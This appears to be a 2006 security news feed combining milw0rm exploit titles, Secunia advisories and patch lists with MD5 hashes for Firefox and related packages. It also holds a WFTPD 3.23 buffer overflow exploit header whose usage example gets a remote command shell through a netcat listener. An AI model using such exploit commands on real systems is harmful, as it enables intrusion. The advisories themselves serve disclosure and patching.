8/19/06 mambo com_babackup Component <= 1.1 File Include Vulnerability
8/18/06 Joomla Artlinks Component <= 1.0b4 Remote Include Vulnerability
8/18/06 PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability
8/18/06 phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability
8/18/06 Mambo MamboWiki Component <= 0.9.6 Remote Include Vulnerability
8/18/06 Joomla Link Directory Component <= 1.0.3 Remote Include Vulnerability
8/18/06 Joomla Kochsuite Component <= 0.9.4 Remote File Include Vulnerability
8/18/06 Sonium Enterprise Adressbook <= 0.2 (folder) Include Vulnerability
8/17/06 Woltlab Burning Board <= 2.3.5 (links.php) SQL Injection Exploit (2)
8/17/06 CubeCart <= 3.0.11 (oid) Remote Blind SQL Injection Exploit
8/17/06 IRSR <= 0.2 (_sysSessionPath) Remote File Include Vulnerability
8/17/06 WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability
8/17/06 POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability
8/17/06 Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability
]]> http://milw0rm.org/exploits/ Mon, 21 Aug 2006 13:19:51 -0400 * wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..

C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444

[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit

C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\wftpd323>
*/]]> http://www.milw0rm.com/exploits/2233 Mon, 21 Aug 2006 09:14:52 -0400 This is Frequently Asked Questions document about the latest zero-day vulnerability in Microsoft PowerPoint. The document describes related malwares as well.<br> NOTE: CVE name in the title will be updated immediately when CVE name is available. http://blogs.securiteam.com/index.php/archives/559 Mon, 21 Aug 2006 09:13:42 -0400 Release Date: 2006-08-17

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Outreach Project Tool

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Kacper has reported a vulnerability in OPT Max, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "CRM_inc" parameter in include/urights.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

The vulnerability has been reported in version 1.2.6. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
Kacper

Original Advisory:
http://milw0rm.com/exploits/2192]]> http://secunia.com/advisories/21517/ Mon, 21 Aug 2006 09:13:19 -0400 Release Date: 2006-08-17

Critical:
Highly critical
Impact: Cross Site Scripting
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: SUSE Linux 10
SUSE Linux 10.1
SUSE Linux 9.2
SUSE Linux 9.3

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-3113
CVE-2006-3677
CVE-2006-3801
CVE-2006-3802
CVE-2006-3803
CVE-2006-3804
CVE-2006-3805
CVE-2006-3806
CVE-2006-3807
CVE-2006-3808
CVE-2006-3809
CVE-2006-3810
CVE-2006-3811
CVE-2006-3812

Description:
SUSE has issued an update for MozillaFirefox, MozillaThunderbird and Seamonkey. These fix some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a user's system.

For more information:
SA19873
SA21228
SA21229

Solution:
Apply updated packages.

x86 Platform:

SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/upda...illaFirefox-1.5.0.6-1.3.i586.rpm
b077ab8d63cbca9fad680e31faa34d80
ftp://ftp.suse.com/pub/suse/upda...ranslations-1.5.0.6-1.3.i586.rpm
083893020c930fb8d0d2ac107e6afcb2
ftp://ftp.suse.com/pub/suse/upda...Thunderbird-1.5.0.5-0.1.i586.rpm
857642c909f7184dc1a6441025c57d82
ftp://ftp.suse.com/pub/suse/upda...ranslations-1.5.0.5-0.1.i586.rpm
41cdd09824e46732fe0160d2eea1db13
ftp://ftp.suse.com/pub/suse/upda...586/seamonkey-1.0.4-2.1.i586.rpm
eecf97bedf164629445589bf5fe96f3a
ftp://ftp.suse.com/pub/suse/upda...nkey-calendar-1.0.4-2.1.i586.rpm
9817cd23edbe982c54e8e9788b068272
ftp://ftp.suse.com/pub/suse/upda...dom-inspector-1.0.4-2.1.i586.rpm
acc5e00265da3c37d75dd8467e942523
ftp://ftp.suse.com/pub/suse/upda...seamonkey-irc-1.0.4-2.1.i586.rpm
7a00bd110f7f36a7adac792b4d385cf2
ftp://ftp.suse.com/pub/suse/upda...eamonkey-mail-1.0.4-2.1.i586.rpm
507c561f4179f75652550dea985fd5c5
ftp://ftp.suse.com/pub/suse/upda...-spellchecker-1.0.4-2.1.i586.rpm
0e528364b0a47d8cc186be99c9273680
ftp://ftp.suse.com/pub/suse/upda...onkey-venkman-1.0.4-2.1.i586.rpm
0756055ab6c663c03520a566e748fd84

SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386...illaFirefox-1.5.0.6-1.2.i586.rpm
169195ef8d8d6aa42578c52301637a7b
ftp://ftp.suse.com/pub/suse/i386...ranslations-1.5.0.6-1.2.i586.rpm
ce2ca0073cb95cd52908eca9162f12db
ftp://ftp.suse.com/pub/suse/i386...Thunderbird-1.5.0.5-0.1.i586.rpm
82c3c849160d835d7dd2e83d58ab46ed

SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386...illaFirefox-1.5.0.6-1.4.i586.rpm
45252c09a02b7947e2dcff6c7b2680f7
ftp://ftp.suse.com/pub/suse/i386...ranslations-1.5.0.6-1.4.i586.rpm
3f916156c178db203e19854f1be14a6e
ftp://ftp.suse.com/pub/suse/i386...Thunderbird-1.5.0.5-0.1.i586.rpm
3878dfec4b42ebf979488794dd5ba153

SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386...illaFirefox-1.5.0.6-1.4.i586.rpm
1a6ec1263972cc8ee19b4b88112cbc91
ftp://ftp.suse.com/pub/suse/i386...ranslations-1.5.0.6-1.4.i586.rpm
10b2b66061b686aab364255edfc7330f
ftp://ftp.suse.com/pub/suse/i386...Thunderbird-1.5.0.5-0.1.i586.rpm
d7a39ac5e59594f326c0a7ebf893025a

Power PC Platform:

SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/upda...zillaFirefox-1.5.0.6-1.3.ppc.rpm
beb4517859e09e23b1c1b8e6fe9f7f1b
ftp://ftp.suse.com/pub/suse/upda...translations-1.5.0.6-1.3.ppc.rpm
f9f7424e954609520a7dcfa5401aa6a0
ftp://ftp.suse.com/pub/suse/upda...aThunderbird-1.5.0.5-0.1.ppc.rpm
a3810db291a8575ec602046534ac0046
ftp://ftp.suse.com/pub/suse/upda...translations-1.5.0.5-0.1.ppc.rpm
1c3f6bdab05076e177c39900b8796291
ftp://ftp.suse.com/pub/suse/upda.../ppc/seamonkey-1.0.4-2.1.ppc.rpm
2a57cf8e9d58c738d08f3457b18c39c8
ftp://ftp.suse.com/pub/suse/upda...onkey-calendar-1.0.4-2.1.ppc.rpm
5e5b4e2bc287c6b9fa8dcd920bd5691f
ftp://ftp.suse.com/pub/suse/upda...-dom-inspector-1.0.4-2.1.ppc.rpm
2b6d0f991fdf834704a717a9da239114
ftp://ftp.suse.com/pub/suse/upda.../seamonkey-irc-1.0.4-2.1.ppc.rpm
8130da7cdb4ece3a5b3ffcd1d8de6604
ftp://ftp.suse.com/pub/suse/upda...seamonkey-mail-1.0.4-2.1.ppc.rpm
42a37ed33a80d3a9c7922b260ec8d017
ftp://ftp.suse.com/pub/suse/upda...y-spellchecker-1.0.4-2.1.ppc.rpm
7ed788d6b9eaaa450c7bdef217d1da0b
ftp://ftp.suse.com/pub/suse/upda...monkey-venkman-1.0.4-2.1.ppc.rpm
22bef32ee56511c1527f2aba2686c31b

SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386...zillaFirefox-1.5.0.6-1.2.ppc.rpm
7088063ef61fef41e8ae463017bc2e7a
ftp://ftp.suse.com/pub/suse/i386...translations-1.5.0.6-1.2.ppc.rpm
1179980ccb74d1268981a991ea99ef76
ftp://ftp.suse.com/pub/suse/i386...aThunderbird-1.5.0.5-0.1.ppc.rpm
50989117d508769abe562192f7a29ac0

x86-64 Platform:

SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/upda...underbird-1.5.0.5-0.1.x86_64.rpm
c3c35689ec4183a3f65eadefe0e035f9
ftp://ftp.suse.com/pub/suse/upda...nslations-1.5.0.5-0.1.x86_64.rpm
c2a68df8c7a37edb184de0d816bc6f40
ftp://ftp.suse.com/pub/suse/upda...4/seamonkey-1.0.4-2.1.x86_64.rpm
2c9f593099e65d8a4bea1ddb4475b51b
ftp://ftp.suse.com/pub/suse/upda...ey-calendar-1.0.4-2.1.x86_64.rpm
546d70365782daeae85bc2a5e042bae6
ftp://ftp.suse.com/pub/suse/upda...m-inspector-1.0.4-2.1.x86_64.rpm
1b985d53285222446923fb37d936d759
ftp://ftp.suse.com/pub/suse/upda...amonkey-irc-1.0.4-2.1.x86_64.rpm
c81a87ba73ed766dc25f2b89b98f4f8e
ftp://ftp.suse.com/pub/suse/upda...monkey-mail-1.0.4-2.1.x86_64.rpm
36ca5818bb717578542d7def4b8724f9
ftp://ftp.suse.com/pub/suse/upda...pellchecker-1.0.4-2.1.x86_64.rpm
2c798a9aa382ff0bc6f0d44c1861156d
ftp://ftp.suse.com/pub/suse/upda...key-venkman-1.0.4-2.1.x86_64.rpm
b6f3a089873cf2df5d82e7fcc4943b28

SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386...underbird-1.5.0.5-0.1.x86_64.rpm
64b491ee5e76fd81d22e6bc03efe6b86

SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386...underbird-1.5.0.5-0.1.x86_64.rpm
5f797b743baa880b609350dce4003e28

SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386...laFirefox-1.5.0.6-1.4.x86_64.rpm
02d00c594d85c27901ac8975ff4074b5
ftp://ftp.suse.com/pub/suse/i386...nslations-1.5.0.6-1.4.x86_64.rpm
c3e1ab3e8bffa3b7fd1f8c93253bd387
ftp://ftp.suse.com/pub/suse/i386...underbird-1.5.0.5-0.1.x86_64.rpm
409577b2b376df93980071fa6b080638

Sources:

SUSE LINUX 10.1:
ftp://ftp.suse.com/pub/suse/upda...zillaFirefox-1.5.0.6-1.3.src.rpm
8052f82d870aa163544f20fb0e6e2a7e
ftp://ftp.suse.com/pub/suse/upda...aThunderbird-1.5.0.5-0.1.src.rpm
a6cc091a2379e066d89f30cc4ef4daca
ftp://ftp.suse.com/pub/suse/upda.../src/seamonkey-1.0.4-2.1.src.rpm
22f8c43051e3f87df2f6c892259b84c1

SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386...zillaFirefox-1.5.0.6-1.2.src.rpm
b369c54440dab641eaca7ffacce2fdca
ftp://ftp.suse.com/pub/suse/i386...aThunderbird-1.5.0.5-0.1.src.rpm
3d8939c81652438cc45df2dfafad3401

SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386...zillaFirefox-1.5.0.6-1.4.src.rpm
6e343044e7c9061e7893d1ad798fb683
ftp://ftp.suse.com/pub/suse/i386...aThunderbird-1.5.0.5-0.1.src.rpm
520ad8710e85f56082e8f744dd7fa9b4

SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386...zillaFirefox-1.5.0.6-1.4.src.rpm
e102231a46d19c0d05f6e31318a6527e
ftp://ftp.suse.com/pub/suse/i386...aThunderbird-1.5.0.5-0.1.src.rpm
206929deb348a7ca699d92cda0e4c3e1

Original Advisory:
http://lists.suse.com/archive/su...rity-announce/2006-Aug/0007.html

Other References:
SA19873:
http://secunia.com/advisories/19873/

SA21229:
http://secunia.com/advisories/21229/

SA21228:
http://secunia.com/advisories/21228/
]]> http://secunia.com/advisories/21529/ Mon, 21 Aug 2006 09:12:26 -0400 Release Date: 2006-08-17
Last Update: 2006-08-18

Critical:
Highly critical
Impact: Security Bypass
Cross Site Scripting
Spoofing
Exposure of system information
Exposure of sensitive information
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: Mandriva Linux 2006

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-2613
CVE-2006-2894
CVE-2006-2775
CVE-2006-2776
CVE-2006-2777
CVE-2006-2778
CVE-2006-2779
CVE-2006-2780
CVE-2006-2782
CVE-2006-2783
CVE-2006-2784
CVE-2006-2785
CVE-2006-2786
CVE-2006-2787
CVE-2006-2788
CVE-2006-3677
CVE-2006-3803
CVE-2006-3804
CVE-2006-3806
CVE-2006-3807
CVE-2006-3113
CVE-2006-3801
CVE-2006-3802
CVE-2006-3805
CVE-2006-3808
CVE-2006-3809
CVE-2006-3810
CVE-2006-3811
CVE-2006-3812

Description:
Mandriva has issued an update for mozilla-firefox. This fixes some vulnerabilities, which can be exploited by malicious people to trick users into disclosing sensitive information, disclose system information, bypass certain security restrictions, conduct cross-site scripting and HTTP response smuggling attacks, and potentially compromise a user's system.

For more information:
SA14938
SA19873
SA19631
SA20242
SA20244
SA20376

Solution:
Apply updated packages. Note that the language packs of the previous patch were incorrectly tagged. Updated packages have been released to correct this problem.

Mandrivalinux 2006

76ef1a2e7338c08e485ab2c19a1ce691 2006.0/RPMS/devhelp-0.10-7.1.20060mdk.i586.rpm
d44f02b82df9f404f899ad8bc4bdd6a2 2006.0/RPMS/epiphany-1.8.5-4.1.20060mdk.i586.rpm
29efc065aeb4a53a105b2c27be816758 2006.0/RPMS/epiphany-devel-1.8.5-4.1.20060mdk.i586.rpm
caad34c0d4c16a50ec4b05820e6d01db 2006.0/RPMS/galeon-2.0.1-1.1.20060mdk.i586.rpm
d0e75938f4e129936351f015bd90a37a 2006.0/RPMS/gnome-doc-utils-0.4.4-2.1.20060mdk.noarch.rpm
652044ff7d9c3170df845011ec696393 2006.0/RPMS/libdevhelp-1_0-0.10-7.1.20060mdk.i586.rpm
bf6dcf87f409d06b42234dbca387b922 2006.0/RPMS/libdevhelp-1_0-devel-0.10-7.1.20060mdk.i586.rpm
e9aaff3090a4459b57367f4903b0458a 2006.0/RPMS/libnspr4-1.5.0.6-1.4.20060mdk.i586.rpm
fa99cbc159722cc0ff9e5710f24ca599 2006.0/RPMS/libnspr4-devel-1.5.0.6-1.4.20060mdk.i586.rpm
d4d45b797ca2f2347c0409d9f956ff25 2006.0/RPMS/libnspr4-static-devel-1.5.0.6-1.4.20060mdk.i586.rpm
8d33e72703090a911f7fd171ad9dd719 2006.0/RPMS/libnss3-1.5.0.6-1.4.20060mdk.i586.rpm
23afd287c042c5492c210255554a6893 2006.0/RPMS/libnss3-devel-1.5.0.6-1.4.20060mdk.i586.rpm
4a188f54230b943ea9c8930eb2e0cfe1 2006.0/RPMS/mozilla-firefox-1.5.0.6-1.4.20060mdk.i586.rpm
3066a80fbf87985e37fa9c288759d56d 2006.0/RPMS/mozilla-firefox-br-1.5.0.6-0.2.20060mdk.i586.rpm
ea4ca97b017f8f1d2d604ef2195fc4c8 2006.0/RPMS/mozilla-firefox-ca-1.5.0.6-0.2.20060mdk.i586.rpm
fbda2f14cff844cd9ba41567697f984a 2006.0/RPMS/mozilla-firefox-cs-1.5.0.6-0.2.20060mdk.i586.rpm
40df72801040003070d99553c9e3ac56 2006.0/RPMS/mozilla-firefox-da-1.5.0.6-0.2.20060mdk.i586.rpm
367900542d61ef7eb1d309cd134d9d60 2006.0/RPMS/mozilla-firefox-de-1.5.0.6-0.2.20060mdk.i586.rpm
4610d0e6e2e9a82fd5d5680605dd44a5 2006.0/RPMS/mozilla-firefox-el-1.5.0.6-0.2.20060mdk.i586.rpm
cdc46b5093163f7e98975b2b38957f88 2006.0/RPMS/mozilla-firefox-es-1.5.0.6-0.2.20060mdk.i586.rpm
7a03a1269eefbeaf11dc1b25f8f1866f 2006.0/RPMS/mozilla-firefox-fi-1.5.0.6-0.2.20060mdk.i586.rpm
c334906066f6d36e3c73aeb762a4360c 2006.0/RPMS/mozilla-firefox-fr-1.5.0.6-0.2.20060mdk.i586.rpm
9679249207f221f5dd5e36f6af519a98 2006.0/RPMS/mozilla-firefox-ga-1.5.0.6-0.2.20060mdk.i586.rpm
f1d893661c5e0acad4520918df2004f5 2006.0/RPMS/mozilla-firefox-he-1.5.0.6-0.2.20060mdk.i586.rpm
6009d8f4c6daf8264c39ce838e27b9be 2006.0/RPMS/mozilla-firefox-hu-1.5.0.6-0.2.20060mdk.i586.rpm
19cc3674df81e4a070cfa7256108e482 2006.0/RPMS/mozilla-firefox-it-1.5.0.6-0.2.20060mdk.i586.rpm
3ac9c2bc04d3fd0c39aee23ad7246047 2006.0/RPMS/mozilla-firefox-ja-1.5.0.6-0.2.20060mdk.i586.rpm
a68321cdf701aa05d53d187b5504e207 2006.0/RPMS/mozilla-firefox-ko-1.5.0.6-0.2.20060mdk.i586.rpm
45236d15d31f20c10de8f6330fe685af 2006.0/RPMS/mozilla-firefox-nb-1.5.0.6-0.2.20060mdk.i586.rpm
3d14682e6a516afc7df1c15f246c1c71 2006.0/RPMS/mozilla-firefox-nl-1.5.0.6-0.2.20060mdk.i586.rpm
8d976e695dc11f0cc566ac356e8ae871 2006.0/RPMS/mozilla-firefox-pl-1.5.0.6-0.2.20060mdk.i586.rpm
28b7dbf8c079430dd21bf41a8b4322f5 2006.0/RPMS/mozilla-firefox-pt_BR-1.5.0.6-0.2.20060mdk.i586.rpm
156fbf0703fb64181ec788fa962c38e9 2006.0/RPMS/mozilla-firefox-ro-1.5.0.6-0.2.20060mdk.i586.rpm
282f8a8abab2866756fe01396f774fd0 2006.0/RPMS/mozilla-firefox-ru-1.5.0.6-0.2.20060mdk.i586.rpm
e68b4f5bd930c9f721be51a026d3a5a9 2006.0/RPMS/mozilla-firefox-sk-1.5.0.6-0.2.20060mdk.i586.rpm
e43aee54683c32249d865aae705980bd 2006.0/RPMS/mozilla-firefox-sl-1.5.0.6-0.2.20060mdk.i586.rpm
578d91940b92feec2935485752dc3376 2006.0/RPMS/mozilla-firefox-sv-1.5.0.6-0.2.20060mdk.i586.rpm
1a7f222366b0ea40bfc74c002d252a3a 2006.0/RPMS/mozilla-firefox-tr-1.5.0.6-0.2.20060mdk.i586.rpm
169be404e20f76d705db97da7be10f5d 2006.0/RPMS/mozilla-firefox-zh_CN-1.5.0.6-0.2.20060mdk.i586.rpm
01fa9f889097019d293aca92a2c3f68d 2006.0/RPMS/mozilla-firefox-zh_TW-1.5.0.6-0.2.20060mdk.i586.rpm
aaba2fa72f8de960a3a757b3010027d3 2006.0/RPMS/mozilla-firefox-devel-1.5.0.6-1.4.20060mdk.i586.rpm
1c7ab93275bcdcf30ed9ec2ddb4893df 2006.0/RPMS/yelp-2.10.0-6.1.20060mdk.i586.rpm
60279919aa5f17c2ecd9f64db87cb952 2006.0/SRPMS/devhelp-0.10-7.1.20060mdk.src.rpm
c446c046409b6697a863868fe5c64222 2006.0/SRPMS/epiphany-1.8.5-4.1.20060mdk.src.rpm
e726300336f737c8952f664bf1866d6f 2006.0/SRPMS/galeon-2.0.1-1.1.20060mdk.src.rpm
e9e30596eceb0bc9a03f7880cd7d14ea 2006.0/SRPMS/gnome-doc-utils-0.4.4-2.1.20060mdk.src.rpm
4168c73cba97276fa4868b4ac2c7eb19 2006.0/SRPMS/mozilla-firefox-1.5.0.6-1.4.20060mdk.src.rpm
56becb4c6755376ee10e50047fee65a0 2006.0/SRPMS/mozilla-firefox-br-1.5.0.6-0.2.20060mdk.src.rpm
4d77e6309e7e375aec38aee2a141e35b 2006.0/SRPMS/mozilla-firefox-ca-1.5.0.6-0.2.20060mdk.src.rpm
fe7bd0b0c6b61416f96d137b1a92a437 2006.0/SRPMS/mozilla-firefox-cs-1.5.0.6-0.2.20060mdk.src.rpm
c3724cca845ce05cf648f362f83038bd 2006.0/SRPMS/mozilla-firefox-da-1.5.0.6-0.2.20060mdk.src.rpm
25fe2702343a719c20605f50d5aa1e34 2006.0/SRPMS/mozilla-firefox-de-1.5.0.6-0.2.20060mdk.src.rpm
41bf67b80e5665de595b2ee9f7721161 2006.0/SRPMS/mozilla-firefox-el-1.5.0.6-0.2.20060mdk.src.rpm
e326a042c23f8a3e1736a8bd0c6ec2a0 2006.0/SRPMS/mozilla-firefox-es-1.5.0.6-0.2.20060mdk.src.rpm
27d9ceca2f738878af2caff5ca0f3242 2006.0/SRPMS/mozilla-firefox-fi-1.5.0.6-0.2.20060mdk.src.rpm
c0f8f908861f6bdce69aa3dedc9d3182 2006.0/SRPMS/mozilla-firefox-fr-1.5.0.6-0.2.20060mdk.src.rpm
9ba714fa16a09fba10ded7ecde966c11 2006.0/SRPMS/mozilla-firefox-ga-1.5.0.6-0.2.20060mdk.src.rpm
47457095800038d73f3bdcb2f0ed36d0 2006.0/SRPMS/mozilla-firefox-he-1.5.0.6-0.2.20060mdk.src.rpm
05009be65b3fea49699b31df71062dee 2006.0/SRPMS/mozilla-firefox-hu-1.5.0.6-0.2.20060mdk.src.rpm
afbd053cdb6ff14c43e689c89c4550e0 2006.0/SRPMS/mozilla-firefox-it-1.5.0.6-0.2.20060mdk.src.rpm
2a0787c0257695b6fc1aaf1bdf8b9534 2006.0/SRPMS/mozilla-firefox-ja-1.5.0.6-0.2.20060mdk.src.rpm
112d4d2954a00325f0a0531bae150d45 2006.0/SRPMS/mozilla-firefox-ko-1.5.0.6-0.2.20060mdk.src.rpm
01c5ab334ff459db03636aa8de1cced5 2006.0/SRPMS/mozilla-firefox-nb-1.5.0.6-0.2.20060mdk.src.rpm
ad95f2d936c8015fd0c6f383975c286f 2006.0/SRPMS/mozilla-firefox-nl-1.5.0.6-0.2.20060mdk.src.rpm
2393b778369ede7080e6e3b846b773e7 2006.0/SRPMS/mozilla-firefox-pl-1.5.0.6-0.2.20060mdk.src.rpm
15c7832479b17e2123762a44bb3f85f3 2006.0/SRPMS/mozilla-firefox-pt_BR-1.5.0.6-0.2.20060mdk.src.rpm
cdb551a0c81fb597818506e9534966ed 2006.0/SRPMS/mozilla-firefox-ro-1.5.0.6-0.2.20060mdk.src.rpm
b56224c409b82426cd1414f4c2694619 2006.0/SRPMS/mozilla-firefox-ru-1.5.0.6-0.2.20060mdk.src.rpm
8941bf88442f03649638b745948ea2f7 2006.0/SRPMS/mozilla-firefox-sk-1.5.0.6-0.2.20060mdk.src.rpm
b929ab1c79140da9439f1ab95be84ff6 2006.0/SRPMS/mozilla-firefox-sl-1.5.0.6-0.2.20060mdk.src.rpm
341dd76ff73c819a0c3af0f568f5989a 2006.0/SRPMS/mozilla-firefox-sv-1.5.0.6-0.2.20060mdk.src.rpm
9d4673a1f24a354f71d2b17b3889c4a2 2006.0/SRPMS/mozilla-firefox-tr-1.5.0.6-0.2.20060mdk.src.rpm
57b9a304899801e30a3c4f451e411a86 2006.0/SRPMS/mozilla-firefox-zh_CN-1.5.0.6-0.2.20060mdk.src.rpm
a42b81860581cc48344a3d3c5e133fcb 2006.0/SRPMS/mozilla-firefox-zh_TW-1.5.0.6-0.2.20060mdk.src.rpm
93cb0acaeddb095d13b37aeb0ab4dd49 2006.0/SRPMS/yelp-2.10.0-6.1.20060mdk.src.rpm

Mandrivalinux 2006/X86_64

d52f4955f15f99137dd9a0b2f360c8b2 x86_64/2006.0/RPMS/devhelp-0.10-7.1.20060mdk.x86_64.rpm
369457b4a09c07ba18ee5bb18fb2ffa1 x86_64/2006.0/RPMS/epiphany-1.8.5-4.1.20060mdk.x86_64.rpm
76735684f3ff493770e374a90fd359c7 x86_64/2006.0/RPMS/epiphany-devel-1.8.5-4.1.20060mdk.x86_64.rpm
5da75ab6624f8c8f0c212ce2299d645f x86_64/2006.0/RPMS/galeon-2.0.1-1.1.20060mdk.x86_64.rpm
945059b9456c9ff2ccd40ff4a6d8ae70 x86_64/2006.0/RPMS/gnome-doc-utils-0.4.4-2.1.20060mdk.noarch.rpm
193f97760bb46e16051ba7b6b968f340 x86_64/2006.0/RPMS/lib64devhelp-1_0-0.10-7.1.20060mdk.x86_64.rpm
1b67733b0450cd6572c9879c0eb38640 x86_64/2006.0/RPMS/lib64devhelp-1_0-devel-0.10-7.1.20060mdk.x86_64.rpm
115fcbc6c99bf063cd1768d2b08e9d89 x86_64/2006.0/RPMS/lib64nspr4-1.5.0.6-1.4.20060mdk.x86_64.rpm
686404fa32e2625f23b19e11c548bbe5 x86_64/2006.0/RPMS/lib64nspr4-devel-1.5.0.6-1.4.20060mdk.x86_64.rpm
f0886b330d3f5af566af6cf5572ca671 x86_64/2006.0/RPMS/lib64nspr4-static-devel-1.5.0.6-1.4.20060mdk.x86_64.rpm
10e9abdcb3f952c4db35c85fe58ad8ad x86_64/2006.0/RPMS/lib64nss3-1.5.0.6-1.4.20060mdk.x86_64.rpm
202bab2742f162d1cbd6d36720e6f7fb x86_64/2006.0/RPMS/lib64nss3-devel-1.5.0.6-1.4.20060mdk.x86_64.rpm
e9aaff3090a4459b57367f4903b0458a x86_64/2006.0/RPMS/libnspr4-1.5.0.6-1.4.20060mdk.i586.rpm
fa99cbc159722cc0ff9e5710f24ca599 x86_64/2006.0/RPMS/libnspr4-devel-1.5.0.6-1.4.20060mdk.i586.rpm
d4d45b797ca2f2347c0409d9f956ff25 x86_64/2006.0/RPMS/libnspr4-static-devel-1.5.0.6-1.4.20060mdk.i586.rpm
8d33e72703090a911f7fd171ad9dd719 x86_64/2006.0/RPMS/libnss3-1.5.0.6-1.4.20060mdk.i586.rpm
23afd287c042c5492c210255554a6893 x86_64/2006.0/RPMS/libnss3-devel-1.5.0.6-1.4.20060mdk.i586.rpm
74811077c91dde3bc8c8bae45e5862a7 x86_64/2006.0/RPMS/mozilla-firefox-1.5.0.6-1.4.20060mdk.x86_64.rpm
476ee9a87f650a0ef3523a9619f9f611 x86_64/2006.0/RPMS/mozilla-firefox-devel-1.5.0.6-1.4.20060mdk.x86_64.rpm
2dec96532b6815c16851ff8ab0fc7782 x86_64/2006.0/RPMS/mozilla-firefox-br-1.5.0.6-0.2.20060mdk.x86_64.rpm
9344503f5029e1106e6f73f5b50f2866 x86_64/2006.0/RPMS/mozilla-firefox-ca-1.5.0.6-0.2.20060mdk.x86_64.rpm
8ed97496222f0234ac2aa85e50d1ec1b x86_64/2006.0/RPMS/mozilla-firefox-cs-1.5.0.6-0.2.20060mdk.x86_64.rpm
73861253ab137d647f8aecd4d74207b7 x86_64/2006.0/RPMS/mozilla-firefox-da-1.5.0.6-0.2.20060mdk.x86_64.rpm
3c89a02774e840bc7b0950001a3a00b0 x86_64/2006.0/RPMS/mozilla-firefox-de-1.5.0.6-0.2.20060mdk.x86_64.rpm
e82c85b58a2cd3d477832c9c569979c2 x86_64/2006.0/RPMS/mozilla-firefox-el-1.5.0.6-0.2.20060mdk.x86_64.rpm
70bc435961a12cf39df566fd231b16a0 x86_64/2006.0/RPMS/mozilla-firefox-es-1.5.0.6-0.2.20060mdk.x86_64.rpm
0b0a69058784f00b9cfd5d4f3e078ea0 x86_64/2006.0/RPMS/mozilla-firefox-fi-1.5.0.6-0.2.20060mdk.x86_64.rpm
5447c5436e2447d18f13d46c4fb445fb x86_64/2006.0/RPMS/mozilla-firefox-fr-1.5.0.6-0.2.20060mdk.x86_64.rpm
6a9e3c0fd3777b4e7d2d6a17bece3857 x86_64/2006.0/RPMS/mozilla-firefox-ga-1.5.0.6-0.2.20060mdk.x86_64.rpm
f2cf1a907884cc7498f1a5bd485e0424 x86_64/2006.0/RPMS/mozilla-firefox-he-1.5.0.6-0.2.20060mdk.x86_64.rpm
5fd37c2bdd060fb05bf96e812c76057f x86_64/2006.0/RPMS/mozilla-firefox-hu-1.5.0.6-0.2.20060mdk.x86_64.rpm
fb21eb787a0e1f30e339431121a7f889 x86_64/2006.0/RPMS/mozilla-firefox-it-1.5.0.6-0.2.20060mdk.x86_64.rpm
d4c9cc5dfbfec3cd9af6f1e6750ad3da x86_64/2006.0/RPMS/mozilla-firefox-ja-1.5.0.6-0.2.20060mdk.x86_64.rpm
ec28ade683c83b871f87d378a84f8b81 x86_64/2006.0/RPMS/mozilla-firefox-ko-1.5.0.6-0.2.20060mdk.x86_64.rpm
0996ebb2c1e087d7ef7eb7b8befadebf x86_64/2006.0/RPMS/mozilla-firefox-nb-1.5.0.6-0.2.20060mdk.x86_64.rpm
4047a8426436599b42366a60278166e3 x86_64/2006.0/RPMS/mozilla-firefox-nl-1.5.0.6-0.2.20060mdk.x86_64.rpm
9c714145a93c32e6ad07ae592068d71a x86_64/2006.0/RPMS/mozilla-firefox-pl-1.5.0.6-0.2.20060mdk.x86_64.rpm
3449354b2e0661eff8d44bf4754e8d42 x86_64/2006.0/RPMS/mozilla-firefox-pt_BR-1.5.0.6-0.2.20060mdk.x86_64.rpm
8b3142193601b299d14a3a7f0c4ef4a8 x86_64/2006.0/RPMS/mozilla-firefox-ro-1.5.0.6-0.2.20060mdk.x86_64.rpm
a28a2acc79e4c942c92ecdeaf8a72ac4 x86_64/2006.0/RPMS/mozilla-firefox-ru-1.5.0.6-0.2.20060mdk.x86_64.rpm
d38d126a7beaf929e6645454fe73bf45 x86_64/2006.0/RPMS/mozilla-firefox-sk-1.5.0.6-0.2.20060mdk.x86_64.rpm
0f222b2d6aca34636f68c6f37eee9d22 x86_64/2006.0/RPMS/mozilla-firefox-sl-1.5.0.6-0.2.20060mdk.x86_64.rpm
